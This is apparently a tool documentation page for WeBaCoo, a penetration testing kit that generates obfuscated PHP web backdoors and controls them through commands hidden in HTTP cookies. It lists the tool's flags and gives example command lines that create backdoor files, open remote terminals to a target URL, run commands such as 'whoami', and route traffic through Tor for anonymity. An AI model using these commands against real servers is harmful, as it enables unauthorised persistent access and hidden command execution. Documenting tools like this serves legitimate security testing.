Web Application Analysisweb-backdoorcookiephpobfuscationremote-terminalcommand-execution

WeBaCoo

WeBaCoo is a script kit for creating web backdoors that utilize cookies for command execution. It supports generating obfuscated PHP backdoor code and establishing remote terminal connections via HTTP requests.

Description

WeBaCoo (Web backdoor cookie script kit) provides scripts for creating web backdoors using cookies, with module support. It enables penetration testers and security researchers to generate PHP backdoor code that hides commands within HTTP cookies, allowing stealthy remote code execution on compromised web servers. The tool supports various PHP system functions and offers options for obfuscation to evade detection.

Primary use cases include post-exploitation scenarios where maintaining access to a web server is needed without deploying traditional shells. Users can generate custom backdoors, connect to them for interactive terminal sessions, or execute single commands remotely. The kit is particularly useful in web application security assessments requiring persistent, cookie-based access methods.

It operates through HTTP methods (GET by default) and supports proxies like Tor for anonymity, logging, and verbose output for debugging. Dependencies include Perl libraries for socket handling and URI parsing.

How It Works

WeBaCoo generates PHP backdoor code that processes commands embedded in HTTP cookie values, using specified system functions like system(), shell_exec(), or exec() to execute them on the server. The backdoor employs delimiters to parse cookie data and supports obfuscation for evasion. For interaction, it sends HTTP requests with commands in cookies to the backdoor URL, capturing output from responses. Remote terminal mode establishes a persistent session, while single command mode executes one-off instructions. Proxies and custom user-agents enhance anonymity, with random delimiters per request adding variability.

Installation

bash
sudo apt install webacoo

Flags

-gGenerate backdoor code (-o is required)
-f FUNCTIONPHP System function to use (1: system (default), 2: shell_exec, 3: exec, 4: passthru, 5: popen)
-o OUTPUTGenerated backdoor output filename
-rReturn un-obfuscated backdoor code
-tEstablish remote "terminal" connection (-u is required)
-u URLBackdoor URL
-e CMDSingle command execution mode (-t and -u are required)
-m METHODHTTP method to be used (default is GET)
-c C_NAMECookie name (default: "M-cookie")
-d DELIMDelimiter (default: New random for each request)
-a AGENTHTTP header user-agent (default exist)
-p PROXYUse proxy (tor, ip:port or user:pass:ip:port)
-v LEVELVerbose level (0: no additional info (default), 1: print HTTP headers, 2: print HTTP headers + data)
-l LOGLog activity to file
-hDisplay help and exit
updateCheck for updates and apply if any

Examples

Display help and exit
webacoo -h
Generate obfuscated backdoor code using system() function and save to backdoor.php
webacoo -g -o backdoor.php -f 1
Generate un-obfuscated backdoor code and save to backdoor.php
webacoo -g -o backdoor.php -r
Establish remote terminal connection to the backdoor URL
webacoo -t -u http://target.com/backdoor.php
Execute single command 'whoami' via remote terminal mode
webacoo -t -u http://target.com/backdoor.php -e 'whoami'
Establish remote terminal using POST method and custom cookie name 'SESSION'
webacoo -t -u http://target.com/backdoor.php -m POST -c SESSION
Connect via Tor proxy with verbose level 1 (print HTTP headers)
webacoo -t -u http://target.com/backdoor.php -p tor -v 1
Check for updates and apply if any
webacoo update
Updated 2026-04-16kali.org ↗